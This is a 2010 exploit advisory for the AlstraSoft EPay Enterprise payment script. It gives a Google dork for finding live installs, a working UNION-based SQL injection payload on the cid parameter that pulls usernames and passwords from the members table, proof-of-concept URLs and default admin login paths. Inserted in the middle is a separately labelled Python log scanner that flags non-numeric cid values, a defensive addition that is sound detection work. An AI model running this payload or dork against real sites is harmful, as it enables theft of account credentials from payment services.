-----------------------------------------------------------------------
EPay Enterprise v4.13 (cid) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author    : v3n0m
Site      : http://yogyacarderlink.web.id/
Date      : April, 23-2010
Location  : Jakarta, Indonesia
Time Zone : GMT +7:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : AlstraSoft EPay Enterprise
Vendor      : http://www.alstrasoft.com/
Price       : $240 USD
Google Dork : "Powered by EPay Enterprise" inurl:"shop.htm?cid=" inurl:"shop.php?cid="
Overview    :

EPay Enterprise was developed by AlstraSoft in response to the growing demand
for online payment processing businesses similar to Paypal and Stormpay.com.
----------------------------------------------------------------

Exploit:
~~~~~~~

-99999+union+all+select+all+null,null,group_concat(username,char(58),password)v3n0m+from+dp_members--

SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/shop.htm?cid=[SQLi]
http://127.0.0.1/[path]/shop.php?cid=[SQLi]
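
Added example (not part of the original advisory or the vendor's code): a defender-side check that scans web access logs for requests to the two endpoints above whose cid value is not a plain integer. The combined log format, the assumption that a legitimate cid is numeric, and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Endpoints named in the advisory.
TARGETS = ("/shop.htm", "/shop.php")
# Assumption: a legitimate cid is a short non-negative integer.
VALID_CID = re.compile(r"\d{1,10}")


def suspicious_cid_requests(lines):
    """Return (line_number, decoded_cid) for shop requests whose cid is not numeric."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith(TARGETS):
            continue
        # parse_qs percent-decodes and turns '+' into spaces, so encoded
        # values are checked in their decoded form.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("cid", []):
            if not VALID_CID.fullmatch(value):
                hits.append((number, value))
    return hits


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [23/Apr/2010:10:00:01 +0700] "GET /epay/shop.php?cid=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [23/Apr/2010:10:00:07 +0700] "GET /epay/shop.php?cid=-1+union+select+null HTTP/1.1" 200 913',
    '203.0.113.9 - - [23/Apr/2010:10:00:09 +0700] "GET /epay/shop.htm?cid=3%27 HTTP/1.1" 500 0',
    '203.0.113.7 - - [23/Apr/2010:10:00:12 +0700] "GET /epay/index.php?cid=abc HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, value in suspicious_cid_requests(SAMPLE_LOG):
        print(f"line {number}: non-numeric cid {value!r}")
```

The same integer-only rule, enforced server-side before cid reaches the query (together with a parameterized statement), removes the injection point rather than only detecting probes against it.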

Default Admin Login Page:
~~~~~~~~~~~~~~
http://127.0.0.1/[path]/admins/login.php
http://127.0.0.1/[path]/admins/login.htm
-----------